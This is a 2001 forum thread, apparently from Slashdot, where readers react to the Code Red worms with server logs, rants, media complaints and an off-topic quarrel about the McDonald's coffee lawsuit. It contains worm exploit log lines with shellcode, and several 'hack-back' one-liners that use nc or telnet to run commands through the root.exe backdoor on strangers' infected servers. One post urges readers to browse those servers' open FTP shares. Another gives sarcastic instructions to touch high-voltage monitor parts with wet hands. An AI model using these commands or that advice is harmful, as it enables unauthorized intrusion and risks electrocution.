It was just a tiny mention, and it was in a little hickville newspaper, but SirCam finally got some print attention. Of course, it was in a Code Red article, which was careful to let the sticks dwellers know that as long as they didn't use NT or 2000 (why would they?) they were safe. I myself recieved SirCam, but since my e-mail client doesn't use scripts, I was safe. Now, if the mainstream net media could only see that we, the wee users, are in more trouble than the big bad companies...
Blog Prophyts - Right On, Man
Here's where I got:
Suggestions? (Non-destructive, please, the goal is to alert not hurt)-- @rjamestaylor on Ello
With all those destructive virus-writers groups and everything, you'd think by now there'd be an Illuminati-type secret organization of white hat programmers somewhere out there that cripple viruses and release a "serum" strain to innoculate systems and close MS's holes.
It would be illegal of course, but, well, Robin Hood broke the law too.
(I'm not advocating this of course, just thinking it's curious no such organization exists)
W
-------------------
This is my SIG. There are many like it, but this one is mine.
The Code Red 2 worm has gotten into the MS corporate network and is running loose behind their firewall. Their internal IIS servers are attacking each other.
Slow them down!!!!!!
i am so very tired....
It's even better for me, my own ISP (noos.net) has machines that are currently attacking me... see the log below :
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.1" 404 283 "-" "-"
212.198.0.93 - - [05/Aug/2001:08:59:41 +0200] "GET
guess what... this is "curie.noos.net", part of my ISP's systems
Sorry that link should have been to the FAQ referenced in the article. The FAQ's old (July 31), but the basics still apply.
http://IP.IP.IP.IP/scripts/root.exe?+/c+start+%20h ttp://www.digitalisland.com/codered/
:/ since it also creates the /c and /d aliases to *keep* them infected...)
...)
Find & run websnarf.pl or grab the IP's off your web logs, run this on the IP of whoever attacks with v2 (XXXXXXXXXXXXXXXXXX) and you're set. It's easier, I think, since it gives them more info (starts their browser & points them to info on CR, though I wish it had more info on how to remove the *trojan* which will not disappear with the patch
I do wish we could autopatch these, but this is the next best thing, since it's not harmful (unlike the format c: ideas some are having... *sigh*
If someone comes up with an autopatch script which grabs the logs from websnarf, then telnets in & fixes them up, I'm open to ideas here...
I've been recording the hits of V1 and V2 from my machine since early this afternoon, thanks to a very handy Perl script provided by another Slashdot user.
You can find the results and a link to the script here
this sucks... I wanted to tie the servers up, but actually, now that I think of it, this will flood the network more...oops....
i am so very tired....
Though I feel like one about now... long night. :)
Those are going to a shared e-mail alias. I get copies of everything, as well as a few other people. Unfortunately, because they are coming in many format types, we have to compile them by hand. But absolutely, please do send us the logs and have them in the format requested.
Shesh, I keep waiting for cnn, abc, cbs, bbc, SOMEONE to report that the internet's security has just been turned to swiss cheese, but all of them are still headlining stories that their technology editor wrote before going home for the weekend about how "The Red Tide receeds", and "Code Red virus not so bad...kinda soft and cuddly".
Visions of thousands of password packet sniffers kicking in Monday morning on CR2 backdoored systems dance in my head....
So if figured this out....maybe they will see it? echo GET /scripts/root.exe?/c+copy+c:\winnt\clock.avi+c:\yo uhavecodered.txt | telnet %1 80
Seems like a good idea. So anyone help me get the IP's out of my access_log so I can feed 'em to the script. I am not to good with sed so..
Some command to grep the access_log for the .ida and then get the IP and put it in a test file?
grep -E \.ida /var/www/log/access_log
Then???
how come the FBI or another goverment agency hasn't bothered to get about the buznuzz of tracking down who wrote this? (if that's even possible?)
Yea, so, I noticed on my 20 IP multi-homed linux server I was getting a lot of hits, so I here's my answer. Notice the confirmation log.
Now what's the W2K command to change the IP to 10.1.2.3?
I am currently logging the attacks on my btopenworld ADSL box by using a dummy default.ida script.
The results are on display here (until my dyndns changes).
Viral code sent is stored in my database and different code variants are logged. I only started logging today.
It is obvious from the stats that V2 is enjoying bt openworld's subnet very much, since all my attacks so far have come from within there.
Weevil
ghaa.
Holy crap. http://www.msnbc.com/news/606910.asp
Always do right. This will gratify some people and astonish the rest. -- Mark Twain
If Code Red III was released now after all these root shells have been exposed, what is the worst thing that it could do on a large scale?
how does sircam affect every email user? shouldnt you say it affects every outlook user who has scripting enabled and is ignorant enough to open attachments they are not expecting?
personally i think a root exploit that is broadcast to everyone on your subnet is worse. especially if your subnet is on @home.
-- john
cat access_log | grep default.ida | cut -d ' ' -f 1 | awk '{printf("echo \"GET /scripts/root.exe?/c+mkdir+c:\IMA_FUCKING_MORON\" | nc %s 80\n", $1);}' > IMA_FUCKING_MORON.sh
So after the code-red and the other one a while back came out, I found out about it as soon as the first attack hit my system (via email) and then checked my logs and was pleased to see many attempts, but no change at all. I'm not trying to be arrogant here, I just wanted to point out that it is possible to secure your IIS (or any system for that matter) so that stupid bugs won't compromise your system.
If God gave us curiosity
As a certain commercial operating system gets more an more bloated, larger and larger files are less noticed. How long before a 1-2MB virus with a couple dozen attack types built in starts making the rounds?
I know, I know - but seriously: I had to patch this on our Win2k machine back in March/April - I'm presuming that this is the Solaris/Windows thing (site must have been slashdotted) or a variant of (forgive my ignorance if I'm wrong). Either way it overwrote the default pages and gave the user some system access - using echo commands to write to files etc... now where was that freakin' link to prove it...
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir+..\ 200 0 871 99 70 HTTP/1.0 - - - -
/msadc/../../../../../../winnt/system32/cmd.exe /c+copy+\winnt\system32\cmd.exe+root.exe 502 0 401 129 90 HTTP/1.0 - - - -
Either way this was what the server logs looked like..
somebody tell me if this is a different bug (but even so the exploit looks similar...)
It could be known as the "Your Welcome" virus.
Unfortunately, I don't know diddly-shit about it.
It seems Code Red not only duplicates itself, but duplicates articles that talk about it!! .. ? tag=mn_hd r ed.ap/index.html , 00.html
2 0&mode=thread 1 9&mode=thread
http://news.cnet.com/news/0-1003-200-6786199.html
http://www.cnn.com/2001/TECH/internet/08/05/code.
http://www.wired.com/news/technology/0,1282,45845
and Ofcourse...
http://slashdot.org/article.pl?sid=01/08/05/16202
http://slashdot.org/article.pl?sid=01/08/05/04332
[alk]
....proudly sports the "Powered by Win2000 Server logo".
I fucking know that you are running Win2k server, that's why you're infected with code red and attacking my poor linux box ;)
"Mary had a crypto key, she kept it in escrow, and everything that Mary said, the Feds were sure to know."
If someone wrote a worm that maintained encrypted peer-to-peer connections between machines or arbitrary ports and a host routing table (gnutella style), this worm would suddenly shift shape into something potentially a lot worse.
If this was then coupled with a self-propagating plug-in system requiring public-key encryption to install plug-in modules, the worm's creator could effectively initiate and propagate counter attacks and defensive measures.
I find this an intriguing but incredibly scary concept.
MSNBC has a longer story.
Fox News has a few words to say.
ABC copied the AP story.
CBS still seems to think the red tide is receeding.
Meanwhile the worm has knocked on my computer's door six times since I started this post. Uh, make that seven.
I admin a class B network and the firewall was taking hits at about 3500 per minute on July 19th. On August 1 the firewall started taking CodeRed hits at around 1200 per minute. Filled up logfiles are no fun, so we stopped logging CodeRed probes a couple of days later. I set up an OpenBSD box with websnarf from http://www.unixwiz.net and several IP numbers, and I am getting about as many Code Red II as Code Red original hits on it. The only thing that will work to cure this is to either attack back and patch, or reboot the machine to slow down the infection. Looking up many of the addresses, you find that it is not the .com guys, it is the Asian and Cable/DSL networks. Where did all those Windows 2000 machines come from?
Say goodby to the Internet, Cringley is right, we need a dog.
While I realize that the press release is unlikely to cover his side of things, this doesn't sound like an equivalent situation. If you have more info, pass it along... I'm not familiar with the case and may be totally off-base. The primary difference seems to be that the other machines weren't attacking his.
The idea of having machines do directed retaliation against attacks is something the government itself uses, as I believe do some companies. While I will grant that changing things on someone else's computer is on questionable ground, I also think that given the circumstances (a machine is attacking yours with a virus) you are probably on safe ground to respond. I think it would only be legal if it was in non-self-propagating form - that is, only used as an automatic response to an attack.
That said, it would be a lot safer if you could filter out governmental IPs... those are the only ones that would be likely to cause any major fuss.
~ Leilah
This is exactly why an infected server should be rebuilt and properly secured...
LedgerSMB: Open source Accounting/ERP
jill.c. Don't regard it as a malicious exploit, it's infact a very powerful remote administration tool. All our NT boxes are not attached to Internet so we don't worry. :)
You'll get beyond c:\ by enclosing your path in quotes eg "c:\Program Files"
Why don' t you add a checking to stay away from Apache servers?! The worm would be more difficult to trace without all those access.log evidence....
/usr/log/apache man.
You are overloading my
If they illegally accessed your machine first, that does not excuse them from liability. If i break in to george's house and steal his gun, then use it to kill gene, george may have liability if he did not report the gun stolen.
i am so very tired....
I'm on a 65.x.x.x att broadband connection. Not sure about you, but my IP is static. Just force your IP address, don't rely on their DHCP server. Your IP address and related information should be on the paperwork the att guy left with you. I'm getting around 150 hits an hour for it. It almost seems to have slowed since this afternoon.
To automatically notify webmasters of infected sites, if you have mod_perl/Apache, use this script:
h prerm
http://forum.swarthmore.edu/epigone/modperl/nehza
It identifies any attempt to access '/default.ida', looks up the MX records of the remote IP, and sends a notification to postmaster@. It is not a 'hack back', just a notification email.
It makes me sad that on a linux system, code red would have been a bug, but on a windows system, its poor administration... To bad the Linux community isn't into dirty behind the back tricks like the evil empire.
As I look at my access logs, it appears that a lot of the code-red2 requests are originating from Asia.
Given what I've read about windows pirating in Asia, this makes me wonder.. How many of the currently compromised systems are running bootleg copies of IIS/Windows and can't easily get the fixed version because they don't actually have a license?
Hopefully we won't have to put up with this virus for longer than we should simply because the security updates aren't 'free'.
Or is the update free to anyone, no questions asked?
Just in the last 12 hours, one person has sent me over 400 copies of this lovely virus. Anyone else just getting attacked?
From: Alliance for the Defense [Claimed cooperative of five polyspecific empires in the Pacific below New Zealand. No record of existence before the Sircam Fall.]
Subject: Code Red
Distribution: Threat of the Blight
So far we've processed half a million messages about this creature, and read a goodly fraction of them. Most of you are missing the point. The principle of the "Code Red's" operation is clear. This is an autonomous worm using electronic communication to operate through an operating system on the Net. It would be fairly easy to do in theory -- we all know the stories of the Morris Worm. But for such communication to be effective within the real world, truly extensive design changes to the base OS must be made. It could not have happened naturally, and it cannot quickly be done to secure operating systems -- no matter what Code Red implies.
We've watched the Microsoft interest group since the first appearance of this Code Red blight. Where is this "Redmond" that they claim to hail from? "In Washington State" they say, and deep in the North. Even their proximate origin, www.microsoft.com, is conveniently slow. We see an alternate theory: Sometime, maybe further back than the last consistent archives, there was a battle between Software Powers. The blueprint for this "Windows" was written, complete with hidden communications interfaces. Long after the original contestants and their stories had vanished, this OS happened to get into a position of prosperity on the Net. And that prosperity was tailor-made, too, re-establishing the Blight which had set the trap to begin with.
We're not sure of the details, but a scenario such as this is inevitable. What we must do is also clear. Redmond, Washington is at the heart of the Blight, obviously beyond all attack. But there are other Windows 2000 systems. We ask the Net to help in identifying all of them. We ourselves are not a large department, but we would be happy to coordinate the information gathering, and the military action against the infected systems that is required to prevent the Blight's spread in the Middle Net.
For nearly seventeen weeks, we've been calling for action. Had you listened in the beginning, a concerted strike might have been sufficient to destroy the Code Red Blight. Isn't the Fall enough to wake you up? Friends, if we act together we still have a chance.
Death to vermin.
so they can keep a count of the infections and see how the worm is propagating through the networks. I myself have been hit 154 times today, but that's a low number because my ISP made our cable modems go dynamic addressing recently. A link to the source code can be found on the page and here. Check frequently, as he updated the code a couple of revisions just today.
"Beware of he who would deny you access to information, for in his heart, he dreams himself your master."
A user on grc.security (news.grc.com) suggested using the Windows "net send" command to send a pop-up message to the infected user. net.exe won't talk across the Internet, but you ought to be able to run the net.exe program on the rooted IIS box, something like:
n et +send+%25COMPUTERNAME%25+You+have+been+infected+by +the+Code+Red+II+Worm+which+attempted+to+attack+my +server
http://ipaddress/c/inetpub/scripts/root.exe?/c+
%25COMPUTERNAME%25 translates to %COMPUTERNAME%, which returns the Windows hostname. I know that works from one of my failed attempts that gave me a reply, but with the above string, I get back a page with "Error in CGI Application" as
the title:
CGI Error
The specified CGI application misbehaved by not returning a complete set
of HTTP headers. The headers it did return are:
and it doesn't give me any return. Can anyone verify and/or debug this? It *might* be working.
The %USERDOMAIN% variable might be useful too, so you could send to the whole Windows domain, "Machine LUSER on DOOFUSDOMAIN is infected with Code Red II" or some such. %USERDOMAIN% is the machine name on systems on a workgroup.
.. how MS software sucks.
The worm should get 400 "Bad Request" on any HTTP server. That's not 404 "File not found." The worm has two spaces between the URL and the HTTP version. The spec says one and only one. So Apache, Zope, and any other sane HTTP server will throw out the request. Sure, it's a quick fix for both MS and the worm writer on this point, but still. RTFRFC!
Just in a period of 5.5hrs Ive logged 209 hits for the new 3rd generation strain, and only 5 hits for the 1st and 2nd strains of Code-Red.
Let's not lose sight of the sea change in attacks against MS systems. No longer is it a human taking a bot's scan output and taking advantage of a vulnerability at a keyboard. Now it's a human updating a script that 1) scans IPs using 300 threads 2) compromises systems by placing command line access on the vulnerable systems 3) places a trojan on the system, and 4) broadcasts the IP of the vulnerable machine. Most important, the updating of the script for the new MS vulnerability of the month is done BEFORE most admins can put the patches into production. Also, for you IDS folks that look for cmd.exe in the string, whose to say the payload won't change next time? The problem here isn't the indexing server vulnerability. It's the attackers marrying hacking with virus writing, so they can come at vulnerable systems before sysadmins have a chance to patch them. Hope you all keep your IDS updated.
Creating an Apache script that patches any infected hosts would be pretty cool, but I'll be impressed when someone writes a script that installs Linux/Apache on infected hosts.
--
"Karma can only be portioned out by the cosmos." - Homer Simpson [1F10]
With 18 hours of logs the following hit counts and hosts are my top offenders:
2566 63.107.89.163
2234 63.107.219.50
1511 63.107.10.4
171 63.219.102.73
120 63.242.234.252
104 63.65.128.25
90 63.210.101.172
69 210.243.141.61
60 63.198.70.196
56 63.221.173.130
This is out of a total of 3643 unique hosts, 26356 requests. I feel like calling and leaving some 'HEY ASSHOLE!' messages to the net admins.
Some stats I ran to see how many times my personal firewall blocked access to my computer on port 80 on a daily basis. Just your typical computer with an always on connection. Very many of them originating from 24.*.*.* Oh, an there currently isn't (and won't be because who cares) a script for generating these. And I grabbed an username that's appropriate. I hope somebody cares. Wait, no I don't.
Despite the rising cost of living, it remains a popular activity.
Last week: 92
Last 32 hours: 196 (175 unique addresses)
Looks like it's concrete bunker time soon... )-:
Got time? Spend some of it coding or testing
Microsoft's products spew pollution into the information space like a burning mountain of tires.
For sure! Take a look at my webserver (which pioneers the great new feature of a "Log File Chat Room" (tm 2001 Lawrence Wade)).
This new variant seems to have been especially active, it's eating up a lot of my bandwidth. Last time, my IP address wasn't getting scanned as much as many other people I spoke with; I'm wondering if this one includes a better random number seed. I'm also seeing IIS victims from my ISP.
Also, I wonder if a disclaimer stating that infected IIS servers are not allowed to visit my website would be sufficient to work towards suing Microsoft for their ongoing gross negligence and complicity causing material and financial damage.
Fire and Meat. Yummy.
"Is there no way that companies could sue Microsoft due to loss of business / bandwidth charges, caused indirectly by poorly written software?"
"Nope, look at your EULA" The statement that the "EULA still applies" is incorrect. The EULA is not binding on anyone who is not a party to the contract (i.e., the End User License Agreement). There is no privity of contract.
Whether Microsoft could be sued under these circumstances raises an interesting, and to my knowledge unprecedented legal issue. It may be possible. One could assert a civil action for negligence. The plaintiffs would argue that but for Microsoft's negligence, they would not have incurred the bandwidth costs.
Microsoft would, undoubtedly among other things, deny that it was negligent, and raise issues regarding proximate / legal cause, as well as intervening cause.
Let me give you a *possibly* analogous example from the world of torts. You leave your keys in your car, and the doors unlocked. Perpetrator steels your car, is chased by the police, and runs over and kills a child. Perpetrator has no assets. The child's parents sue you for negligence for the wrongful death of their child. Result?
If you say you are not liable, then add these facts. The evidence shows that: (a) you left your car in a horrible neighborhood where cars are routinely stolen; and (b) you knew this fact. Result?
If you still say you are not liable, then add the fact that your car had itself been previously stolen on four occasions within the past year. Result?
I wouldn't be surprised if a well-funded law firm filed a class action lawsuit against MS for negligence and other causes of action. It would be a reach, and very expensive, but the publicity and potential pay off might make it worth it.
Only Women Bleed (Sex, Sharia remix)
Jeez people, never look a gift horse in the mouth!
http://l-usersIP/scripts/root.exe?/c+dir+c:\
start searching from there...
* > 100000
* mDmcOaA5pDmoOaw5sDnAOeA56DnsOfA59Dn4Ofw5ADoEOgg6H
Okay. Forgive me if the syntax is off, I've never had to play with procmail filters. But it strikes me that this one would be significantly more useful:
* X-mailer=Outlook
:)
Fire and Meat. Yummy.
You really don't have many permissions on this for something called 'root.exe'. I tried to make a dir on the users desktop folder called "you have the code red II virus see incidents dot org for help" but got permission denied. So I left a folder of that name in the root folder, and renamed 'root.exe' to 'root.123' so no-one else can dick with it. My good deed for today...
"that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
Rules for successfully surviving a trilogy:
Step 1: Don't run Microsoft servers (duh...)
Step 2: ?
Step 3: Repent! (if you ever ran an MS server)
http://xxx.xxx.xxx.xxx/scripts/root.exe?/C+dir%20a :\
Like I said, I'm tired of bothering with this without any windows machine to work on. So, someone else can take it up and put it to use (the funny name is so it doesn't get executed as cgi or mod_perl): <link>cr_response.perlscript</link>. You can run it as cgi or command line. I'm just setting the apache conf to deny access and skip logging from outside my lan. Enjoy.
I wonder if you could claim something like self-defense for something like this?
I'm being actively attacked, multiple times, by someone elses hacked machine. That is an "unauthorized intrusion" attempt into my machine. If I go and perform an "unauthorized intrusion" on their machine in order to shut them down so as to protect my own services, why would I get in trouble for that?
Sure, it's not like the guy tried to shoot me and I had to shoot back to protect myself, but it seems like a proportionate response to me.
At least, that's MY way of thinking.
$0.02 (CDN)
The McDonals coffee case judge was not braindead. get teh facts straight, they have been mentioned even here hundreds of times already. The coffee was hot enough to cause severe burns on contact, and McD knew it was so and they still sold the coffee at such temperature.
You're kidding, right? I think you are, but I'm not sure. Okay. Well, I'll treat my response as if you're serious.
I worked at a McDonalds, aeons ago, when I was in high school. Like, 1991. Probably when you were still in kindergarten.
I worked there for four years. My first year, it was hell, I was minimum wage scum, but McDonalds is like the army: you get out of it exactly what you put into it.
Well, I was nice with everyone, and I always arrived on time, and I always worked hard. And I was quickly awarded Employee of the Month. Less than a week after that, I was asked to come in for a staff meeting. I thought I was in trouble for something. All the managers sat me down very seriously, and asked me if I knew why I was there. They passed me a package and told me to sign for its receipt. I did, then I opened the package. It was a manager's uniform with my name on the little gold tag.
I got to know a lot about McDonalds and its customers in the 3 years that followed. It was, believe it or not, a great job and I made a lot of friends working at McDonalds with whom I'm still in touch.
As a part time ("Swing") manager, I got to help ensure that the restaurant ran smoothely. Ordering supplies, ensuring the staff have everything they need, resolving conflicts, assuring quality control, and dealing with customer complaints.
One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.
Now, of course, since some slovenly white trash got rich because of her own stupidity, I'm sure the customer complaints about cold coffee are even more common. From what I understand, the coffee is to be kept at 73C now.
Of course it's hot. Coffee is supposed to be hot. Next thing is people will start suing over Eskimo Pie migraines they get when they drink their cold Coke too quickly.
GM recently got sued for several billion dollars. It was Christmas Eve in about 1995 when this tragedy occured. A family was riding along in their 1978 Chevy Malibu (already an old car). They were stopped at a red light, and a drunk driver hit them from behind. The car's gas tank exploded, and while the family were all concious and relatively unhurt, when they got out, one of the kids had third degree burns to his leg. So they sued GM for faulty fuel tank design.
Now, one thing about this case that terrifies me is that this was a 17-year-old car at the time of the accident. Who knows what nature of wear had been experienced? Rusted out gas tank? For all we know, this car shouldn't have been on the road to begin with.
The other thing that terrifies me is that the jury wasn't allowed to hear how fast the vehicle that rear-ended them was travelling. Remember, they were stopped at a traffic light. They were hit by a drunk driver in a full-size pickup truck travelling at 75MPH. Approximately 120km/h.
Changes things a little, doesn't it? How survivable is that accident?
Rather than suing GM because a 17 year old car blew up when it was rear-ended by a 4,000lb mass travelling at 75MPH, I think I'd be writing a letter to GM to thank them for the fact that despite such a horrific accident, I still had both my kids.
Your remark suggests a tacit support of the excessive litigation against businesses. My wish upon you is that you mortgage your house, open a business, and get sued by someone who gets a paper cut off your first invoice.
Fire and Meat. Yummy.
One of the most common customer complaints was that the coffee was too cold. And yet, as part of my quality control role, I was responsible for ensuring that the temperatures on every cooking appliance were correct when I started my shift. The coffee, at the time, was to be kept at 85C.
I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.
Though you'd like this... AOL has been hit by the Code Red worm.. Its unconfirmed wether its version 1 or 2, but Warner Brothers in the US and UK networks are down. AHHAHAHAHAHAH AOL SUCKS!
"It's not like your minds are as open as the source you love..." - Me to the majority of Slashdot.
A disproportionate number of the hits on my (Australian) web servers [sources] are from asian countries, leading me to suspect that perhaps the non-English versions of the patch and/or some of the prerequisite Service Packs were released late and/or not as well publicised.
If I was forced to ride shotgun on one of these security sieves, I'd be checking for patches twice daily. And I'd have the sucker behind a non-M$ reverse proxy.
Got time? Spend some of it coding or testing
Not so easy, the right service packs appear to be required first. So your little proggie would first have to determine what was needed, second download and install it all, then finally clean off the rootshell.
Got time? Spend some of it coding or testing
I decided to take a look at some of the systems that I've gotten Code Red II probes from. It's amazing how unsecured these things are. Scan their ports. Log in to their ftp servers. Don't worry. You don't need a password. Note that you can read and write to their cgi-bin directory. Please don't make them crash. Look but don't touch. Others will want to have a look at them too.
Checking some of the IP addresses in my firewall log, I'm getting the default web pages for Apache...even on Red Hat...is there some way that someone can change the pages on an infected machine? For example, check out http://209.5.115.231/ for example, or http://209.236.45.125/
Confused@home
Do this don't do that Can't you redesign.
Don't put a lobster on a plate!
He'll use his magnet to escape!
He'll jump right up and claw your ear,
And then he'll bite your EYE!
I don't care what temperature you set it to when YOU worked at mcdonalds, dumbass. The woman got THIRD DEGREE burns. That is TOO HOT for coffee. Idiot.
Yeah. So, she's apparently not intelligent enough to be trusted with coffee, or tea, or hot chocolate... I'd also draw the line at giving her a driver's license. In fact, I'd legislate that people like her should have to wear helmets everywhere they go.
I can't drink coffee at 73C, let alone 85C. But I also know that at 85C, people complain that the coffee is too cold. Those are the edicts from McDonalds, not the temperature at which I independently chose to set the Bunn's thermostat.
So? I carefully put my coffee aside and let it cool.
As for the third degree burns, you can get third degree burns from something that is a mere 50C. Note that is the temperature to which most hot water heaters are set. Are you therefore a proponent of a law requiring everyone to turn down their hot water heaters to 37C so that they can't burn people? Heck, there are lots of other things that can burn you. If you're stupid, take the back cover off your monitor. Right at the back of the picture tube's neck, you'll find that there is an area of glass heated by radiant heat leaving the cathodes. Rest your finger there and see how many yucks you have. Let's ban monitors because they can hurt people. Let's ban stoves because a child could turn on a burner and scorch himself. Let's ban cars because the radiator gets warm. Of course, we can't let people have bicycles, either, there are many ways to get hurt on *those*, least of which being the elevated temperature of the brake pads after stopping.
You, sir, like the bovine hausfrau who was too stupid to ensure that her coffee didn't spill on her lap, are the idiot. If I were President, I'd find you and your peers a nice little padded cell somewhere so that you may avoid any sort of risk or personal responsibility for your activities.
And, PS. While you're in the monitor, look for the big coils of wire around the funnel of the tube. Okay. Find the wires that go to the area of the big plastic block and the big red wire that goes to the suction cup on the back of the tube. Now, this is very important... turn on the monitor and lick your hands. Touch the sheetmetal shielding inside the monitor with your left hand. With your right hand, simultaneously touch the solder connection where the horizontal deflection voltage leaves the PC board (near the big plastic box, remember). Feeling warm yet? If your skin isn't on fire within a few seconds, you didn't follow the instructions right.
Fire and Meat. Yummy.
If your coffee is too hot, add an ice cube or let it cool off. If your coffee is too cold, you curse McDonalds for making cold coffee. Coffee is supposed to be hot. Most domestic coffee brewers percolate boiling water up; the steam condenses and drips into the filter basket, and enters the pot at a temperature very close to boiling. No one sues Mr. Coffee or Black and Decker.
Anyhow, as you simultaneously manage to frustrate and bore me, this thread is now extinct. Maybe once you can shave daily and manage to become remotely cosmopolitan, your perspective will adjust somewhat.
Fire and Meat. Yummy.